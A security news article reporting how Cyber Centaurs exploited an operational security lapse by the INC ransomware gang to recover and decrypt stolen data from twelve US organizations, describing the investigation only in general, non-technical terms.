INC Ransomware Blunder Exposes Data of 12 US Organizations
▼ Summary
– An operational security failure by the INC ransomware gang allowed researchers to recover stolen data from a dozen U.S. organizations by analyzing exposed attacker infrastructure.
– The investigation began after a client detected ransomware and shifted to infrastructure analysis upon finding artifacts from the Restic backup tool, which the attackers used selectively.
– Researchers discovered hardcoded credentials in scripts, theorizing that the gang’s data repositories persisted long after attacks, retaining encrypted victim data.
– Using a controlled process, they confirmed and decrypted data from 12 unrelated U.S. companies, none of which were their clients, and involved law enforcement.
– The team created detection rules to help identify Restic tool misuse and listed INC’s attack tools, noting it is a RaaS operation active since mid-2023.
A significant operational security lapse by the INC ransomware gang has led to the recovery of stolen data from twelve American organizations. This discovery was made possible through a detailed forensic investigation that uncovered attacker-controlled infrastructure, revealing not just the tools used in a single incident but a persistent repository holding information from multiple, unrelated victims. The findings highlight a critical vulnerability in how some cybercriminals manage their stolen assets, potentially offering a path to data recovery long after an attack concludes.
The investigation was conducted by the digital forensics firm Cyber Centaurs, which began its work after a U.S.-based client detected ransomware activity encrypting a production SQL server. The malicious payload was identified as a variant of RainINC ransomware, executed from the Windows PerfLogs directory, a location increasingly exploited by threat actors for staging attacks. During their analysis, researchers encountered artifacts from the legitimate backup utility Restic, even though it wasn’t deployed in this specific breach. This anomaly shifted the focus from mere incident response to a broader infrastructure analysis.
The digital traces left behind included renamed executable files, PowerShell scripts designed to run Restic, and hardcoded configuration details like access keys and repository paths. These remnants suggested the gang was using the backup tool selectively as part of its standard toolkit. Crucially, the researchers hypothesized that if INC routinely reused the same Restic-based storage across different campaigns, then the data repositories might remain active long after individual ransom events were resolved. This meant stolen information could persist in an encrypted state on attacker servers, potentially accessible for recovery.
To test this theory, the team developed a safe, non-destructive process to enumerate the contents of the discovered infrastructure. This confirmed the presence of encrypted data belonging to twelve separate U.S. organizations across sectors including healthcare, manufacturing, technology, and services. None were clients of Cyber Centaurs, and each represented a distinct, unrelated ransomware incident. Following this discovery, the researchers decrypted the backups, preserved the data, and contacted law enforcement to assist with validating ownership and guiding the proper restitution procedures.
The report from Cyber Centaurs details a range of tools associated with INC ransomware operations, such as network scanners, remote access software, and cleanup utilities. To aid defenders, the team also created detection rules (YARA and Sigma) to help identify the Restic tool or its disguised binaries operating in suspicious contexts, which could signal an impending ransomware attack. INC ransomware operates as a Ransomware-as-a-Service (RaaS) platform that emerged in mid-2023 and has claimed numerous high-profile victims globally, including major corporations and government entities. This incident underscores that lapses in criminal operational security can sometimes provide a rare opportunity for defenders to reclaim what was stolen.
(Source: Bleeping Computer)
